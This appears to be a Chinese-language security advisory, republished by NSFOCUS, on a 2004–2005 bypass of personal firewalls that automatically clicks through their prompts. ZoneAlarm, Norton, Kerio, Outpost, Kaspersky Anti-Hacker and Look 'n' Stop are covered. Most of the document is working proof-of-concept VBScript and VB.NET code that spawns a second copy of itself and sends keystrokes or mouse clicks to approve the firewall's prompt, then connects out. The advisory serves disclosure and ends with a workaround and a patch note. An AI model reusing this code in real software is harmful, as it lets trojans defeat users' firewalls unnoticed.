安全研究

安全漏洞
多个防火墙产品设置绕过漏洞

发布日期:2005-01-03
更新日期:2005-01-04

受影响系统:
Zone Labs ZoneAlarm Pro 4.5.538.001
Zone Labs ZoneAlarm Pro 4.5
Symantec Norton Personal Firewall 2004
Symantec Norton Personal Firewall 2003
Symantec Norton Personal Firewall 2002
Kerio Personal Firewall 4.1.2
Kerio Personal Firewall 4.1.1
Kerio Personal Firewall 4.1.0
描述:
多数个人防火墙允许快捷方式或者接口控制通信。

多数个人防火墙访问实现控制存在问题,远程攻击者可以利用这个漏洞可以通过控制鼠标或者发送快捷方式来绕过防火墙控制,完全访问系统。

攻击者可以设置一个VBScript脚本,此脚本执行一个多线程的自身的实例并当第一个实例连接到Internet时发送快捷方式给防火墙,可导致控制防火墙行为,绕过控制。

另外也可以通过鼠标控件来绕过,程序没有使用一个实际的多先程,因为部分防火墙会直接打断程序执行,因此程序使用一个参数执行另一个自身的实例来实现,绕过防火墙控制。

利用这个问题,可导致木马等恶意程序进行SERVER监听或者直接访问防火墙而不被防火墙提示。

<*来源:Ferruh Mavituna (ferruh@mavituna.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110478641332370&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Ferruh Mavituna (ferruh@mavituna.com)提供了如下测试方法:

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'Modified for Agnitium Outpost Firewall 2.1.303.4009 (314)
'Tested : Agnitium Outpost Firewall 2.5.369.4608 (369)
'5/5/2004
'02.01.2005
'Ferruh Mavituna
    'Const DELAY = 1000
    'Const TIMES = 1
    'Const EXTRADELAY = 0

'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i, appName
Const DELAY = 1000
Const TIMES = 1
Const EXTRADELAY = 0

appName = Wscript.ScriptName

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    
    'First Sleep for a while
    If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

    'Force
    While i<TIMES
        i=i+1
        WScript.Sleep DELAY
        '1) First add it  trusted
        shell.sendKeys "+{TAB}" 'Go back once
        shell.sendKeys "{UP 2}" 'Go Up

        '1) Press Enter
        shell.sendKeys "{ENTER}" 'Enter
    Wend

    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.open "HEAD", URL, FALSE
    web.send ""
    connect = web.getAllResponseHeaders
    Set web = Nothing
End Function
["anti-hacker.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Bypassing multiple firewall products
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'HISTORY
    '3/5/2004
        'Added ZA

    '5/5/2004
        'Added Kerio, Outpost

    '6/5/2004
        'Added Kaspersky Anti-Hacker
'***********************************************************

Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall
Const EXTRADELAY = 0
Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall

'----------------------------------------------
'Define Delays and Times for Firewalls
'----------------------------------------------
    '// Firewalls
    'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP)
    Const ZoneAlarm = 0
    
    'Kerio 4.0.14
    Const Kerio = 1

    'Agnitium Outpost Firewall 2.1.303.4009 (314)
    Const Outpost = 2

    'Kaspersky Anti-Hacker 1.5.119.0
    Const Kaspersky = 3

    'Select Active Firewall
    intFirewall = Kaspersky

    '// Configuration
    'Kaspersky Anti-Hacker
    arrDelays(Kaspersky,0) = 1000
    arrDelays(Kaspersky,1) = 1

    'Define Keys for Firewalls
    arrKeys(Kaspersky,0) = "{ENTER}"



If DETERMINEFIREWALL Then
    'TODO:Read Registries and determine it !
End If

Dim argLen, shell, sendKeyMod, i, j, appName
appName = Wscript.ScriptName

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    
    'First Sleep for a while
    If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

    'Force
    While i<arrDelays(intFirewall,1)
        i=i+1
        WScript.Sleep arrDelays(intFirewall,0)
        
        'Send Keys
        For j=0 To Ubound(arrKeys,2)
            If arrKeys(intFirewall,j)<>"" Then
                shell.sendKeys arrKeys(intFirewall,j)
            End If
        Next

    Wend

    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.open "HEAD", URL, FALSE
    web.send ""
    connect = web.getAllResponseHeaders
    Set web = Nothing
End Function
["ZoneAlarm.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit

Dim argLen, shell, sendKeyMod, i
Const DELAY = 10
Const TIMES = 15

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    While i<TIMES
        i=i+1
        WScript.Sleep DELAY
        shell.sendKeys "%R" 'Remember, Do not ask again !
        shell.sendKeys "%Y" 'Click Yes
    Wend

    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run("skipZA.vbs /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.open "HEAD", URL, FALSE
    web.send ""
    connect = web.getAllResponseHeaders
    Set web = Nothing
End Function
["testFirewall.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Simple Firewall Test File
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit

Dim shell, sendKeyMod, Result
Const URL = "http://ferruh.mavituna.com"

'Connect
Wscript.Echo "Now I'll try to connect to " & URL

If connect(URL,Result) Then
    Wscript.Echo "Mission Accomplished..., Here is the headers;" & vbNewline & Result
Else
    Wscript.Echo "OK, I couldn't access to Internet"
End If

Set shell = Nothing
Wscript.Quit 1

Function connect(ByVal URL, ByRef Result)
    connect = True
    On Error Resume Next
        
        ERR.Clear
        Dim web
        Set web = CreateObject("Microsoft.XmlHttp")
        web.open "HEAD", URL, FALSE
        web.send ""
        Result = web.getAllResponseHeaders
        Set web = Nothing

    If ERR<>0 Then connect = False
End Function
["norton.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit

Dim argLen, shell, sendKeyMod, i
Const DELAY = 10
Const TIMES = 15

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    While i<TIMES
        i=i+1
        WScript.Sleep DELAY
        shell.sendKeys "%A" 'Remember, Do not ask again !
        shell.sendKeys "%O" 'Click Yes
    Wend
    'Customized for norton fw by Oezguer Mavituna
    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run("skipZA.vbs /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.open "HEAD", URL, FALSE
    web.send ""
    connect = web.getAllResponseHeaders
    Set web = Nothing
End Function
["mousecontrol.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 5/19/2004
'// Simple POC for Bypassing multiple firewall products
'// Code : VB.NET
'***********************************************************

Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dx As \
Long, ByVal dy As Long, ByVal cbuttons As Long, ByVal dwExtraInfo As Long)  Private \
Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)


    Private Const MOUSEEVENTF_LEFTDOWN = &H2
    Private Const MOUSEEVENTF_LEFTUP = &H4
    Private Const MOUSEEVENTF_MIDDLEDOWN = &H20
    Private Const MOUSEEVENTF_MIDDLEUP = &H40
    Private Const MOUSEEVENTF_RIGHTDOWN = &H8
    Private Const MOUSEEVENTF_RIGHTUP = &H10

    Private Const sleepTime = 0.5    'As Second
    Private Const slowMotion = True    'Debug !

    'Firewalls
    Const ZoneAlarm As Integer = 0

    'Set Points
    Dim arrFirewalls(1, 3) As Integer
    Dim activeFirewall As Integer = ZoneAlarm

    Private Sub setupFirewalls()
        'Get Current Screen
        'This is just POC, Real World Example should automaticly detect installed firewall, \
change sleep times, car about exact positoin, taskbar position etc. But It's easy to \
write a real world example  Dim screenY As Integer = \
Screen.PrimaryScreen.Bounds.Height  Dim screenX As Integer = \
Screen.PrimaryScreen.Bounds.Width

        arrFirewalls(ZoneAlarm, 0) = screenX - 250        'X Remember !
        arrFirewalls(ZoneAlarm, 1) = screenY - 130         'Y

        arrFirewalls(ZoneAlarm, 2) = screenX - 190         ' Yes
        arrFirewalls(ZoneAlarm, 3) = screenY - 93

    End Sub

    Private Sub frmFirewallTest_Load(ByVal sender As System.Object, ByVal e As \
System.EventArgs) Handles MyBase.Load

        'Hide  App
        Me.ShowInTaskbar = False
        Me.Visible = False

        'Args
        Dim flagArg As String = Application.ExecutablePath

        If Environment.GetCommandLineArgs().Length > 1 Then

            'Sleep;
            Sleep(sleepTime * 1000)

            'Try;
            setupFirewalls()

            If slowMotion Then Sleep(1000)

            'First Access
            bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))

            If slowMotion Then Sleep(1000)
            bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))

            'Gain Access for HTTP
            Sleep(300)

            If slowMotion Then Sleep(1000)
            bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))

            If slowMotion Then Sleep(1000)
            bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))

            'Quit !
            Me.Dispose()
        Else

            System.Diagnostics.Process.Start(flagArg, "skipme")

            'Access Internet
            If downloadURL() Then
                MessageBox.Show("Successed !, Firewall ByPassed !", "Firewall ByPassed !", \
MessageBoxButtons.OK, MessageBoxIcon.Warning)

            End If

            Me.Dispose()
        End If

    End Sub


    'Bypas POC
    Private Sub bypassFirewall(ByVal X As Integer, ByVal Y As Integer)
        'Save Old Positions for return !
        Dim oldX As Integer = Cursor.Position.X
        Dim oldY As Integer = Cursor.Position.Y

        'Set New Position
        Cursor.Position = New Point(X, Y)

        'Click
        mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
        mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)

        'Return
        Cursor.Position = New Point(oldX, oldY)

    End Sub

    'Connect Internet
    Private Function downloadURL() As Boolean
        downloadURL = True
        Try
            Dim wc As New System.Net.WebClient()
            wc.DownloadFile("http://ferruh.mavituna.com", "C:\firewalltest.htm")
        Catch
            MessageBox.Show("Can not connected !", "Not Connected !", MessageBoxButtons.OK, \
MessageBoxIcon.Error)  downloadURL = False
        End Try
    End Function


["bypassSendKey.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Bypassing multiple firewall products
'***********************************************************
'HISTORY
    '3/5/2004
        'Added ZA

    '5/5/2004
        'Added Kerio, Outpost

    '6/5/2004
        'Added Kaspersky Anti-Hacker
    
    '5/9/2004
        'LooknStop

    '5/20/2004
        'Norton
'***********************************************************

Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall
Const EXTRADELAY = 0
Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall

'----------------------------------------------
'Define Delays and Times for Firewalls
'----------------------------------------------
    '// Firewalls
    'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP) | www.zonelabs.com
    Const ZoneAlarm = 0
    
    'Kerio 4.0.14
    Const Kerio = 1

    'Agnitium Outpost Firewall 2.1.303.4009 (314) | www.agnitium.com
    Const Outpost = 2

    'Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com
    Const Kaspersky = 3

    'Look 'n' Stop 2.04p2 | www.looknstop.com
    Const LooknStop = 4

    'Norton | www.norton.com
    Const Norton = 5

    'Select Active Firewall
    intFirewall = ZoneAlarm


    '// Configuration
    'Define Keys, Delays, Repeat Times for Firewalls
    
    'Kaspersky Anti-Hacker
    arrDelays(Kaspersky,0) = 400
    arrDelays(Kaspersky,1) = 2

    arrKeys(Kaspersky,0) = "{ENTER}" 'Just say OK

    'ZoneAlarm
    arrDelays(ZoneAlarm,0) = 10
    arrDelays(ZoneAlarm,1) = 15

    arrKeys(ZoneAlarm,0) = "%R" 'Select Remember
    arrKeys(ZoneAlarm,1) = "%Y" 'Yes

    'Outpost
    arrDelays(Outpost,0) = 1000
    arrDelays(Outpost,1) = 1

    arrKeys(Outpost,0) = "+{TAB}" 'Go back once
    arrKeys(Outpost,1) = "{UP 2}" 'Go Up
    arrKeys(Outpost,1) = "{ENTER}" 'Enter

    'Kerio
    arrDelays(Kerio,0) = 100
    arrDelays(Kerio,1) = 10

    arrKeys(Kerio,0) = " " ' Space - Remember, Do not ask again !
    arrKeys(Kerio,1) = "%P" ' Yes

    'LookNStop
    arrDelays(LooknStop,0) = 1000
    arrDelays(LooknStop,1) = 1

    arrKeys(LooknStop,0) = "(%+{TAB})" ' Authorize
    arrKeys(LooknStop,1) = "{LEFT}" ' Left
    arrKeys(LooknStop, 2) = " " ' Space

    'Norton
    arrDelays(Norton,0) = 100
    arrDelays(Norton,1) = 5

    arrKeys(Norton,0) = "%A" ' Allow
    arrKeys(Norton,1) = "%O" ' OK


If DETERMINEFIREWALL Then
    'TODO:Read Registries and determine it !
End If

Dim argLen, shell, sendKeyMod, i, j, appName
appName = Wscript.ScriptName

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    
    'First Sleep for a while
    If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

    'Force
    While i<arrDelays(intFirewall,1)
        i=i+1
        WScript.Sleep arrDelays(intFirewall,0)
        
        'Send Keys
        For j=0 To Ubound(arrKeys,2)
            If arrKeys(intFirewall,j)<>"" Then
                shell.sendKeys arrKeys(intFirewall,j)
            End If
        Next

    Wend

    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.open "HEAD", URL, FALSE
    web.send ""
    connect = web.getAllResponseHeaders
    Set web = Nothing
End Function
["Kerio.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'Modified for Kerio 4.0.14
'5/5/2004
'Ferruh Mavituna
    'Const DELAY = 100
    'Const TIMES = 10
'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i, appName
Const DELAY = 100
Const TIMES = 10

appName = Wscript.ScriptName

'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    While i<TIMES
        i=i+1
        WScript.Sleep DELAY
        shell.sendKeys " " 'Remember, Do not ask again !
        shell.sendKeys "%P" 'Click Yes
    Wend

    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


Function connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.open "HEAD", URL, FALSE
    web.send ""
    connect = web.getAllResponseHeaders
    Set web = Nothing
End Function

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

*  所有允许的行为必须询问密码。

厂商补丁:

Zone Labs
---------
ZoneLabs Team已经提供最新版本修正此漏洞:

http://www.zonelabs.com/

浏览次数:3631
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障